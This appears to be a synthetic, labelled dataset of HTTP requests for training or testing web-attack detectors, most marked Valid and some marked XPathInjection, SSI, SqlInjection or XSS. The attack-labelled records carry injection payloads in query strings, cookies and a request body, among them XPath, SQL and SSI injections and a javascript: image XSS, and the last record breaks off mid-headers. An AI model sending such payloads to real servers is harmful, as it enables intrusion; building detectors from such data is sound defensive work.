GET /qqDYmxTq.VEGQx/iRdGy/daumeeooeabv.js?slah1ggbtee=indG&hbstsTuh6=wrmfgnytnZUn&YKJsystem.j=%29+++%28++++%7C++++%28displayName%3Dhad*%29+%28name+%3D++++had*++%29%28mail%3Dhad*++%29 HTTP/1.1
Host: 158.185.187.246:01
Connection: r8fuhe
Accept: image/*, text/plain, image/jpeg;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 150.1.113.3
Cookie: mnpatpbrpry19h=1
Cookie2: $Version="388"
Date: Sat, 05 Aug 06 15:43:32 GMT
ETag: "zquZ.85zU@b08iEVA7ZH"
Expect: 100-continue
From: ufiseea@gios.org
If-Modified-Since: Mon, 17 Dec 07 05:10:16 UTC
If-Unmodified-Since: Sat, 01 Aug 09 22:38:42 GMT
If-Match: "cca5.6ISIkjdZr8kIR"
If-None-Match: "NFfENmEb00JDlZZI-cj"
If-Range: Tue, 14 Nov 06 03:17:46 GMT
Max-Forwards: 45
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: NTLM YWd0eWlmbThlRWpub3JzY2xkbnhlRXRyZWVqeTJhbjd0MG4=
Range: -087,245-62681,-648438
Referer: /gsodaMo4/sNxeardo/WeemTi/reorlf/ehee3.png
TE: deflate;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/7.1 (X11; U; Solaris 4.2; L6-el; rv:0.3.6) Gecko/17219401
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9397x4761
Via: 5.4 3.197.180.209, FTP/4.3 www.hEr2A1d.tiff
Transfer-Encoding: gzip
Upgrade: depz/4.8, sndttt/4.3
Warning: 217 201.65.24.14 "trTmQnnra" "Fri, 16 Apr 04 06:13:32 CET"
X-Forwarded-For: 134.223.187.109
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38505
Start - Id: 21921
class: Valid
GET /icCFD5kbt4Yq-wW.k/ahenzdezIutiwltol/u6/maS1.exe?Ydluhnpoiccm=55&naots=rbJEW%40&wherejuB=9293534&QkLg9-winntqYEVZ=nNoKA2oj&0nv9oprurtuo9a=s9iKHMBp&nayetaoie8h=3&rT5z_9KB8=elre HTTP/1.1
Host: www.r1csn.it:0270
Connection: eru6ro
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 185.90.130.232
Cookie: chho4htuoouiivR=8276510430
Cookie2: $Version="2"
Date: Thu, 31 Jan 08 13:10:18 GMT
ETag: "4cjBhO4xuaN9ToBuhnzE"
Expect: 100-continue
From: eregee@ddutgEiyN.be
If-Modified-Since: Sat, 27 Jun 09 18:01:36 GMT
If-Unmodified-Since: Tue, 16 Oct 07 24:58:22 CET
If-Match: "ILNX0-bqaYEj-4QPm"
If-None-Match: "dmHWzELgYq3n6a_4@-A"
If-Range: Sat, 24 Mar 07 11:13:35 UTC
Max-Forwards: 6144
MIME-Version: 5.9
Pragma: bSohsile=esvhiXe
Proxy-Authorization: Basic YXBiYTpqZW1r
Authorization: Basic NmFOaHo6YW1vbQ==
Range: -6
Referer: /pAhr.pdf
TE: gzip,gzip,deflate;q=0.0
Trailer: Referer
User-Agent: Mozilla/0.2 (X11; U; SunOS sun4u 4.2; t7-by; rv:9.8.8) Gecko/78585159
UA-CPU: x86
UA-Disp: 964,7426,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6616x2901
Via: 1.3 www.genlo.jpeg
Transfer-Encoding: deflate
Upgrade: etdaw/8.1, coe/5.4, 79eOoi/1.6, 3ean/3.4
Warning: 706 118.112.66.251 "faTC6" "Thu, 05 Oct 06 20:03:57 UTC"
X-Forwarded-For: 160.249.23.173
X-Serial-Number: 09176432061314
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21921
Start - Id: 31035
class: Valid
GET /Oi/it2tgmP9PgS.php3?P9itten1c=8o9s%3Csf%3E&tps=rcoe&arc0esi=dtua2allugtnlqxgDoc&LEQ@scriptgOpefsK=+Ot&S@ZF8ainccat1=tdoopencaot+aCem&iihhqwhwlnaErsu=hfp87tj1eYsr&fW7ATIE=ue&ppzpv=%25xmlan&NGUJOpE3K=afdd&wfqZw1@=axo%3CdwRunion&lloBzizmooctX3=%24-&d0ue3uyeowtT=lzmconnecta HTTP/1.0
Host: www.nXitt.fr:47
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: compress, identity;q=0.2, deflate;q=0.2, identity
Accept-Language: ot-8ePHsmn, ci-n, uershh-So1os;q=0.8, ht-sw, eyfam-nv;q=0.2
Cache-Control: max-stale=21
Client-ip: 39.5.59.243
Cookie: ohvD9TI=49;ham2ltxrrep=$e6gercsHn1ucasock_stream1nrm
Cookie2: $Version="0"
Date: Tue, 17 Aug 04 11:33:12 CET
ETag: "4Qz7i2fqLNR-BZg3Z"
Expect: 100-continue
From: dhorkpeo@necsezdc4.be
If-Modified-Since: Mon, 29 Nov 04 18:18:57 CET
If-Unmodified-Since: Mon, 12 Sep 05 20:24:31 GMT
If-Match: *
If-None-Match: "PufCyM1Fjydvdv5vChN"
If-Range: Mon, 08 Nov 04 06:03:05 CET
Max-Forwards: 0198
MIME-Version: 4.5
Pragma: ogeAtoE=lptnueh
Proxy-Authorization: NTLM bnQwbXNoNkluMGVsc3dhdmFpZXNucmh5dG9rbGdsYXNodHVv
Authorization: Digest username="eshrre"
Range: -14
Referer: /gZandem/r0erttri/ogbkyoyh.gif
TE: gzip,gzip;q=0.8,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/5.5 (compatible; MSIE 0.1; SunOS sun4u; OgMa; hRleptAn; rnssgnded5)
UA-CPU: MIPS
UA-Disp: 690,606,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 0898x5454
Via: rI8ab/3.0 106.219.112.53, HTTP/9.4 www.hshv0owh.js
Transfer-Encoding: compress
Upgrade: nEPRir/6.0
Warning: 549 88.129.127.197 "ioEqr1" "Fri, 12 Dec 08 18:53:48 GMT"
X-Forwarded-For: 212.22.173.189
X-Serial-Number: 827318624572609
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31035
Start - Id: 23701
class: Valid
GET /evalPZBsOUcatT/eLItSem9ua8pu/hqcW80msgqb4GTmViZfC/0J4l9xcmd0allocatione.shtml?OrJsamEj32=njWZu&ksi4araAutj=6eAelbkU+tq&nhbcerfsXote=ezrnP&aO7lianit=%2Bnode&8ahucbrGteh=sa9&wdmtprigt=0dl%7CIid+8h&a3aOasalauseu=zn4fuag&l8Ncon7ncraDe=sajss8mochac&sf=551918534&netcatN1V3290=98688525&snHa=wMvZA6BaR&ao1noroi=2806&jtrnl0eui=58&2rtise4hzqrHo=aLPv8 HTTP/1.0
Host: 1.94.6.150:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: us-ascii;q=0.4, iso-8859-5;q=0.0, iso-8859-4;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 103.148.150.147
Cookie: Ypghtpasst=8oaetniga2jnadeEsg;eNitdnsunpz=s
Cookie2: $Version="7"
Date: Sun, 07 Sep 08 12:40:09 CET
ETag: W/"VgZhKD9NhHdEZ3Nql8O"
Expect: 100-continue
From: aoma9pu@etChsK.com
If-Modified-Since: Sat, 25 Oct 08 23:08:11 CET
If-Unmodified-Since: Thu, 31 Dec 09 03:28:28 GMT
If-Match: "xdJiD3xGfRr7DqL_chVL"
If-None-Match: *
If-Range: Thu, 02 Dec 04 13:24:16 CET
Max-Forwards: 9
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Basic Nml0aTZodzp4RG9jYWl0
Authorization: NTLM bGJlQVJ2ZWw4YzlldG9pR2lEZTUwc21udWx0ZW5zaHJv
Range: 970085-59,16356-937515,323-30
Referer: http://www.ee0e.be/skjsi6ai/Bgayyd.ace
TE: deflate
Trailer: Cache-Control
User-Agent: andxe/4.4.3.4
UA-CPU: MIPS
UA-Disp: 188,809,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3131x3591
Via: FTP/2.0 28.166.166.116, dTt9/3.5 80.117.57.129
Transfer-Encoding: identity
Upgrade: 1ataa8/2.4, tfcco/9.9, ntpeI/3.5, Kng5/3.3, ii3/6.1
Warning: 856 71.214.87.68 "aesKobNh8beti" 
X-Forwarded-For: 248.81.152.247
X-Serial-Number: 13224
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 23701
Start - Id: 16806
class: Valid
GET /IE5jI/j-/eiBmnqwjahl5Be/.like4h.css?naetxo=51&s8=zi&eilC8jangrhiF=n2blJ_czET&onuiogtu=489&ows=kKc&owsiaacbh=oUesrpoatStaI&lewuanYk6=26146728&ywseefxpzsriHea=la1R&metafpQ87p=likeoN&gsa9roeveborhsr=processing-instructionb1%29tt&Gzcan=nechoquancat%5D HTTP/1.0
Host: 222.152.194.110
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: t-fnm, ip-hter, wT-weet, euo11Iiw-Kta9hp7;q=0.5
Cache-Control: no-cache
Client-ip: 72.141.137.166
Cookie: 0yO0gHqaor.8d=rmee;nvhcLloneire=iaf0t2esnreektu;nrwatwoNeh=rreoa\nnF;ZqbetcnQI=lay;zbOnso=eKESNk
Cookie2: $Version="799"
Date: Thu, 17 Jul 08 16:11:43 GMT
ETag: "eDJW6Hbje_@K5qFy"
Expect: 100-continue
From: qeirgp@9goyD.st
If-Modified-Since: Sun, 01 May 05 09:06:51 UTC
If-Unmodified-Since: Sat, 21 Jul 07 12:49:06 CET
If-Match: "Q8ynMzC8qIN-6WE"
If-None-Match: *
If-Range: "dDh5-krbotmATM_GOh"
Max-Forwards: 7970
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: Basic Q2VhbmF0ZDpnZWRrd211
Range: 20-,951-7,269801-
Referer: /ntenet0/Sh8n.msf
TE: gzip;q=0.4,gzip,trailers
Trailer: Cache-Control
User-Agent: dSg58rMR http://www.oefvLery.de
UA-CPU: PowerPC
UA-Disp: 081,028,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 147x268
Via: 9.8 www.tosseyaa.shtml, HTTP/3.5 93.255.62.239
Transfer-Encoding: deflate
Upgrade: ypon/2.7, buer/1.4
Warning: 678 197.44.245.117 "nMimiaytii" "Tue, 15 May 07 10:57:17 GMT"
X-Forwarded-For: 28.244.33.30
X-Serial-Number: 60090044663
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16806
Start - Id: 35618
class: XPathInjection
GET /e.g/Nes.aspx?qisetsfrlewscb=bex0ohGsam&OQ=iwu&f2v5oHiscool=eil&bB0g7RG=cdsi%27+++++or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+++%27nhtoce%27%3D++++%27&VUDPcg9idSJ=29&bosrdTeqbtTt=08345314&speFaMncxhm7c=0if%26a7Sd60auv3+eqs&5vautoh7tsUont=A&dhorioep2=8&heoltwod1slnlr=vTfAjcuF7E0c&sie0shy=s%25Ti HTTP/1.0
Host: 224.190.69.226
Connection: keep-alive
Accept: application/*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-age=48753
Client-ip: 33.82.203.224
Cookie: l1=tttjtdrqakbswt;HxTNRW9IMWo=swc
Cookie2: $Version="65"
Date: Fri, 07 Jul 06 22:43:26 UTC
ETag: "yveLgmdxNwRjS_so3"
Expect: ioh3hbt
From: orei@biOfnOuc.com
If-Modified-Since: Fri, 20 Jul 07 03:01:23 GMT
If-Unmodified-Since: Wed, 26 Jan 05 08:46:34 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Apr 04 22:46:36 UTC
Max-Forwards: 8
MIME-Version: 1.3
Pragma: abs='4gy'
Proxy-Authorization: Basic c3l0ZWVBdDI6YU5paXRm
Authorization: Basic aTBvN29mOmpKdXM=
Range: -827333,2893-
Referer: http://c3uo.st/wlbsk/ldic/2eb7T9Q/iti9sae/rnYpmcEn.conf
TE: trailers
Trailer: Via
User-Agent: densttlerNsil1
UA-CPU: Sparc
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 817x128
Via: 4.4 www.7bsokueo.html, 6.6 www.ytosl.html
Transfer-Encoding: fese
Upgrade: sivn/3.0
Warning: 510 208.23.212.198:55713 "gsNb3nolnttct" 
X-Forwarded-For: 163.147.115.220
X-Serial-Number: 65275952070459353
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35618
Start - Id: 35492
class: XPathInjection
GET /3rd1opfe/wSrbnp3lie/x8vkedku/oHvIR2WwZxZD/2oteyp6a.mspx?PCxtHQRh02=03881604&aoeafsgxdssi=replace+l&enlLz9apmEhewo=dspUCaa&61execLsSEZV=tujtbot2yflpBnuokt HTTP/1.1
Host: www.h1ea0et.gov
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad, windows-1251;q=0.4, iso-8859-8, ks_c_5601-1987
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-cache
Cookie: form@wwrxA=9766347580;iwehhnerhc1nowh=m=andUr;eev0g9gieHaeea=37247    or     count(path/child::node()[position()=((i+j+k+l+1)]    |   path/child::*()[position()=(k+1)])=1    or     8312=;de72naywrn=ffITrqKi3
Cookie2: $Version="58"
Date: Sun, 19 Jul 09 02:38:43 GMT
ETag: W/"tiivAPoMMzogU-aEGqo"
Expect: 100-continue
If-Modified-Since: Wed, 04 Apr 07 20:13:27 GMT
If-Unmodified-Since: Wed, 17 Mar 10 02:59:57 GMT
If-Match: *
If-None-Match: "skww5pfOCfWR3pMNnFPC"
If-Range: "nBRv-wtJ6cWRhL3"
Max-Forwards: 433
Pragma: adre='rtse6'
Authorization: NTLM c29wbmN0YXk1ZnNpaW81YVJpb2VvaDllN2RuZU5ubWpjdmU=
Referer: /otiep/wka5tur8.js
TE: deflate,deflate;q=0.4,trailers
Trailer: Upgrade
User-Agent: svF5Y@jN0G http://www.aof3eea.fr
UA-Disp: 8924,467,32
UA-OS: Windows 98
Via: ewml/3.5 225.194.169.170, HTTP/2.0 3.108.208.191, nst/1.2 www.8L4dpkA.png:2136
Transfer-Encoding: deflate
Upgrade: ae5ym/5.7
X-Forwarded-For: 184.57.165.17
X-Serial-Number: 424672879741132737
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35492
Start - Id: 39194
class: SSI
PUT /teeolia/rV922vY0EBVFzUy4/deu/ic.bin? HTTP/1.1
Content-Length: 356
Content-Language: Dktb,tmBuiayn
Content-Encoding: deflate
Content-Location: /ln9f/utoeoast/oteo4xrs/dCeeesn.jpg
Content-MD5: aHNjallybHRlb2UxdW9lcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jun 06 10:05:37 GMT
Last-Modified: Tue, 15 Feb 05 20:13:48 CET
Host: 215.169.176.222:80
Connection: Ahuiotu
Accept: image/gif;q=0.5, image/jpeg;q=0.2, audio/*;q=0.0
Accept-Charset: x-mac-arabic, x-mac-japanese, x-mac-korean;q=0.9, windows-1253;q=0.7
Accept-Encoding: gzip;q=0.5, identity;q=0.0, compress
Accept-Language: *;q=0.4
Cache-Control: idUo='oae'
Client-ip: 165.60.213.241
Cookie: stc9vi=tfh\t ;rnz5nf5vcaioio=efwe-N
Cookie2: $Version="0"
Date: Fri, 18 Aug 06 12:11:10 CET
ETag: W/"4o6Nz.t2GynO1u6u"
Expect: 100-continue
From: nGxh@nraae5E.gov
If-Modified-Since: Tue, 20 Jun 06 06:15:09 CET
If-Unmodified-Since: Tue, 06 Dec 05 11:19:41 UTC
If-Match: *
If-None-Match: "buUy7ulYGta65KvPnS5"
If-Range: Sun, 16 May 04 14:18:59 UTC
Max-Forwards: 640
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM MlV6Zm9ucG1PZUdNaXRwc2xycUFmRWVzQXNBbnQwQngyeWFJ
Range: 9551-5,16355-,24-90
Referer: /iifespi/zrsten/etmaIe.jsp
TE: gzip;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.4 (compatible; Konqueror/2.3; Mac OS X; hlm2grr; Eraos)
UA-Disp: 631,569,16
UA-Color: color16
UA-Pixels: 466x9263
Via: 8.7 www.rlt7h.shtml, 6.6 17.188.193.219
Transfer-Encoding: compress
Upgrade: erE/1.2, jEaa/5.4, tqau/4.0
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Forwarded-For: 113.114.213.108
X-Serial-Number: 4765226560917916
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

od4MiPydbne=<!--#email fromhost="www.ldawnn.com" tohost="mailbox.llggh.com" message="nePtft fhsdei 0tnie ai9" fromaddress="ete9z.com" toaddress="etuIt.aohhdt.com" subject="Tel" sender="Ani.com" replyto="o1ennyg.com" cc="nA" inreplyto="nDso Etag ofh" id="ehaemail" -->&inh4qErmo=4tyn

End - Id: 39194
Start - Id: 21812
class: Valid
GET /4B/iYy@oNrP/gX7UGfhrXvU-m.html? HTTP/1.1
Host: 233.160.72.66
Connection: close
Accept: audio/x-wav, image/jpeg
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, compress;q=0.0, compress;q=0.7, identity, identity
Accept-Language: wndhn6eY-H1;q=0.5, phoeue0r-asnfs144;q=0.3
Cache-Control: max-age=5
Client-ip: 196.172.163.174
Cookie: dl=aIm_fG8ta
Cookie2: $Version="412"
Date: Tue, 20 Jul 04 05:37:17 GMT
ETag: W/"h2ZOQ8GkeMdfl7Omwh"
Expect: e9ns
From: qn7fi@stAorh.org
If-Modified-Since: Tue, 31 Aug 04 12:10:53 GMT
If-Unmodified-Since: Thu, 29 Oct 09 23:56:51 CET
If-Match: "G8GhglZlq395IVA7M"
If-None-Match: "59dnqVECrA1KBH9QaXu"
If-Range: "gk4wh8fcxwRRJU6RCO3a"
Max-Forwards: 4
MIME-Version: 1.2
Pragma: oflceuLr=af1c
Proxy-Authorization: NTLM cXJlYXNDbkE2enhlbW40aHI0emdld2hlb296aWU3bm4=
Authorization: seuesq RrdXiyhh=ooi6v
Range: 728147-66,8714-380,41-
Referer: http://tyele.gov/gsua/skenn.php
TE: chunked
Trailer: Accept-Charset
User-Agent: Mozilla/9.2 (Machintosh; U; PPC 5.6; e9-it; rv:0.2.1) Gecko/31915719
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 777x599
Via: 0.8 11.126.27.101
Transfer-Encoding: compress
Upgrade: eAsu/5.0, gdb/6.1
Warning: 052 www.rdtt1ah.js "6g169" 
X-Forwarded-For: 32.5.142.115
X-Serial-Number: 8436166703567420278
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21812
Start - Id: 42296
class: SqlInjection
GET /dduceninhhlll/havingXkYusWhxQLVIm/0z/seMXckOI5int.hsOS/gt3fdrsm/munA3a-PFf/AnystsoselaL/tyPwoEPZeXmYxcM3U@wr/r-6uJqO/nn85Ef7ahgfdn.css?8a5eE=or+++++0%3C%3E%28select++++count%28*%29+++++from+++++etk%29&osadktlelI7leep=bwgetebeetltm0aEA%5C8p%28&1rIeeohLi=hllt34caazer7ib&olkone2b8th=eatekTne8t&i4ia=l%40j&klnna3npuist=372648&cswchDcolmct=mgorlemeu%3C&lyt=aHeygq.I HTTP/1.0
Host: 44.20.162.199
Connection: close
Accept: audio/basic, image/gif;q=0.2
Accept-Charset: hz-gb-2312;q=0.8, iso-8859-3;q=0.9, x-mac-korean, ks_c_5601-1987, cp-950
Accept-Encoding: gzip
Accept-Language: ipne-dexie3lt
Cache-Control: eeoaC=qeyh
Client-ip: 135.182.107.81
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="095"
Date: Tue, 14 Dec 04 07:57:31 GMT
ETag: W/"17F1n2q6q2So7mxf"
Expect: qssn
From: 8eae@aimsslc7.net
If-Modified-Since: Tue, 20 May 08 24:32:21 UTC
If-Unmodified-Since: Sun, 09 Aug 09 19:25:15 UTC
If-Match: "79N6weC8TiNHylJR"
If-None-Match: "Ov5nFjambTHI4234Ir"
If-Range: Sun, 20 Apr 08 14:07:00 UTC
Max-Forwards: 69
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM c2NTYTJ1bDV3emVlZXlUZWV0ZHJhZXR5ZHJiN2dlaWNvY2ZTaWhlZW9ybWNq
Authorization: geSL smaxehu=eLdtQ
Range: -568889,-588214
Referer: http://4oeshn6t.be/ieeo/sarxahco/ac6ilu/grsa8r.tar.gz
TE: gzip,trailers
Trailer: Trailer
User-Agent: Mozilla/7.1 (compatible; aete; WinNT; aa4prL)
UA-CPU: 68000
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5338x078
Via: FTP/6.4 www.ieIl.gif:705, aeae/7.0 www.tss8og.css
Transfer-Encoding: wtaZya; iEiNota=sh2ite
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 451 www.eiet.jpeg "i5xleaeaz" 
X-Forwarded-For: 116.157.87.80
X-Serial-Number: 401722
----: --------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42296
Start - Id: 23923
class: Valid
GET /r9WT/dCfosgsd0u2RuCq/2tebEocmcesziTi3d/ol9enyuSi3gsiyal3nkg/haoynei/P25GTrDFOHhiframe.cgi? HTTP/1.1
Host: www.usMee.de
Connection: sahI8T
Accept: text/*
Accept-Charset: gb2312, x-mac-turkish, iso-8859-8-i, x-mac-chinesesimp
Accept-Encoding: compress, gzip, compress
Accept-Language: aSkrohmh-rheesscm;q=0.4, suip-e3t;q=0.3, s-o1n0;q=0.6
Cache-Control: no-store
Client-ip: 18.137.112.142
Cookie: hc7qeietaeDsi=okasRALe8c;s0ndeh=76201;_Yf0IB1=4nmee7onaneftotblf
Cookie2: $Version="82"
Date: Thu, 04 Jan 07 05:55:27 CET
ETag: W/"o1k84rC7tsnY8nbdP0O1"
Expect: 100-continue
From: gptydse@odstynsmus.de
If-Modified-Since: Sun, 05 Apr 09 19:54:57 UTC
If-Unmodified-Since: Sun, 07 Jan 07 13:11:37 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4235
MIME-Version: 0.2
Pragma: dlaU='Ygtl'
Proxy-Authorization: NTLM NnVleW96U2JjdGVlc0VkbXN5c1dlaGVlOGVhdHRvdVNuZm5uZWF0
Authorization: Basic ZTZsYjphM1JlRWVj
Range: 44896-8775,-22396
Referer: /tusdee/eslO/hihO/udahn67s.fgf
TE: chunked;q=0.0,gzip;q=0.6,chunked
Trailer: Accept-Charset
User-Agent: wirOl (6JbCLphw; d9TZWV; nhxle4W; rL9zi2KuY)
UA-CPU: StrongARM
UA-Disp: 722,7012,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 228x664
Via: 6.8 www.eaetu.jpg, 8.5 53.211.6.14, 2.9 www.dOesoaa.shtml
Transfer-Encoding: gzip
Upgrade: tehni/0.9, Cea4fl/2.0, ztoh/4.3, pe6/2.9, ad9/9.3
Warning: 790 171.116.173.213 "hopsown6nqcIceI3A" "Sat, 01 Oct 05 02:13:23 CET"
X-Forwarded-For: 220.20.217.236
X-Serial-Number: 383867
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23923
Start - Id: 47008
class: XSS
GET /eeeaztelHv/O7Qb2W/tNPWFcJ/6Q0o5qomprgeez4s/arTfARaXRmpABqdt0p/z52Suin5eEat/7E/l4.J/kVeCW7F6u@.7b/2Xl/nStK0iMw408IXXVo___.asmx?sebooom3saatO=%3F-&odaiIua=52905&Aotb6selbnnw=toesona6bao&eoeretscgt8=58271&wlnse6reoa=326816183&rat=1&XAvbscriptIse-z1=%24s&6ZHM8K=srTeDw&BwodFmAnniilm=optBja6ya0Ause&echHahyzdon=00035498&TkjC-UsZA=%3Cimg%2Bsrc%3Djavascript%3A++++alert%28%27m4.yaraee%27%29+%3E&nthmtahixncuo37=4387692131 HTTP/1.0
Host: 73.110.147.139
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=50902
Client-ip: 18.81.58.217
Cookie: psOi=khtsf3dcoeteSeocs;trErsLnMc8rdmaa=ctEsomlochp;i3c2hues=dFeg0wb4ClTj;G.e2M6IoptXU=8n
Cookie2: $Version="07"
Date: Sun, 27 Mar 05 17:09:27 CET
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 100-continue
From: vsl8rn@orhoE.de
If-Modified-Since: Sat, 08 Aug 09 10:50:52 GMT
If-Unmodified-Since: Mon, 25 Apr 05 06:06:36 CET
If-Match: "CwTB2XXNvef_-QGHF"
If-None-Match: *
If-Range: "610W8G7WRQcXWAW"
Max-Forwards: 97
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Basic bGNzZzphYXNy
Range: 5-22964
Referer: /oaEaw/tR9nAp/9omt3et/u6Eq3n.swf
TE: gzip;q=0.3,trailers
Trailer: Upgrade
User-Agent: Mozilla/4.7 (compatible; MSIE 6.3; Solaris; ce1yaeiol; h4igao; etlyrqnsy)
UA-CPU: x86
UA-Disp: 175,1584,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 347x3393
Via: Ais/6.2 55.196.188.47, 2.1 88.186.140.32
Transfer-Encoding: aoav
Upgrade: me2u/0.5, c1ltE/4.5, nttiep/4.6, nsse/9.4, npleer/2.6
Warning: 566 128.189.134.143 "YDlny79wlhoin" "Sun, 22 Jun 08 15:26:41 CET"
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 159927284892004319
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47008
Start - Id: 12587
class: Valid
GET /n4FQMuNd/0tv6wtnscinf/lcv/t1ze9eXZYJo1mJUxZ/nJ/iyt/flGLWXqMbXzHm2hpG/scCtyfft/sanssnudL/sllatXqcDDdadiuds6.jpeg?ldnn=reasib HTTP/1.0
Host: 190.199.100.122
Connection: close
Accept: text/*, image/gif;q=0.1
Accept-Charset: x-mac-ce, iso-8859-2;q=0.9
Accept-Encoding: 
Accept-Language: m2bnq-vnu;q=0.8, nztar5-crte, aEnrmtRp-8se4t7eh;q=0.2
Cache-Control: no-transform
Client-ip: 167.122.99.35
Cookie: n4acdeaat2dui=966716307;3rgiiomhm=fieA5ts)f\;ifiyoonxs=95238;oieL5hioAjiYD4=ahreifeoFsC
Cookie2: $Version="62"
Date: Sat, 28 Aug 04 22:38:35 CET
ETag: "9msxFVcv@1EKQ5tlu3"
Expect: 100-continue
From: r2nhMrp@wree.uk
If-Modified-Since: Tue, 01 Sep 09 10:39:44 GMT
If-Unmodified-Since: Thu, 01 Feb 07 05:36:47 GMT
If-Match: "XmGycHs4AXs17jsqcLPP"
If-None-Match: "hJTIwMWAzcCgExrV-"
If-Range: *
Max-Forwards: 03
MIME-Version: 4.9
Pragma: yiyMaohV=6
Proxy-Authorization: Digest cnonce="iCAy"
Authorization: hept Bs1ee1ir=rbrafo2
Range: 132-,3231-699
Referer: /lltSd9e/y9idehi/xtenonhl/ihtfdn.aspx
TE: chunked;q=0.5,trailers,trailers
Trailer: Via
User-Agent: l_HG6wHl3p http://www.eneCfpg.cz
UA-CPU: StrongARM
UA-Disp: 3658,3398,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 366x415
Via: FTP/2.8 232.141.212.118, eptha/3.6 www.srap.jpeg
Transfer-Encoding: egntro; cpgtlB=a7il
Upgrade: uSo/9.1, rndat/1.0, nioo/1.0
Warning: 950 23.61.199.108 "rrrlTggd8Eewtaio" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12587
Start - Id: 31797
class: Valid
GET /ru9hyvnSvbha/c2lgErh0tuweOd3o/bGPW_YohW91aGzZL/a-q.exe? HTTP/1.1
Host: www.n34olem.gov
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-8-i;q=0.4, iso-10646-ucs-2;q=0.7, iso-8859-4
Accept-Encoding: *
Accept-Language: Hslw-s2snslle, Bkei-uekholEa
Cache-Control: no-cache
Client-ip: 121.31.252.223
Cookie: NoaPadoo=372;q2Eaes=+1 ioi
Cookie2: $Version="5"
Date: Mon, 08 Dec 08 07:01:32 CET
ETag: W/"lfyKD--OrA3HwQQN2HL"
Expect: goaioeaf
From: dtdacndA@tAnldhs.uk
If-Modified-Since: Mon, 28 May 07 05:48:28 CET
If-Unmodified-Since: Fri, 01 Jan 10 01:33:59 UTC
If-Match: "L8oNK6SttNRan.7SC9P"
If-None-Match: "Beh66uDNk4USpSKK"
